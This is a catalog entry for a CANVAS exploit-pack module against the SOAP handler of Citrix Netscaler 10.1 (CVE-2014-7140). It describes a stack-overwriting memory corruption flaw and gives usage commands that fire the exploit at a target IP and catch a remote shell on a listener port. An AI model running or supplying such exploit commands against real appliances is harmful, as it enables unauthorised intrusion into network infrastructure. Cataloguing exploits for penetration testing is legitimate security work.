Name | citrix_netscaler_soap |
CVE | CVE-2014-7140 |
Exploit Pack | CANVAS |
Description | Citrix Netscaler 10.1 Soap exploit |
Notes | FoundBy: Console Cowboys Notes: A vulnerability exists in the SOAP handler of the web interface. A SOAP request can be crafted to trigger a memory corruption flaw, overwrite the stack and execute our shell. Based on exploit discussed at http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.htm Tested against Citrix Netscaler 10.1 Usage: ./exploits/web/citrix_netscaler_soap.py -v 1 -t 10.10.13.20 -l 10.10.13.1 -d 5555 ./commandlineInterface.py -v 1 -p 5555 VENDOR: Citrix CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7140 CVE Name: CVE-2014-7140 |
Learn more about the CANVAS Exploit Pack here: CANVAS |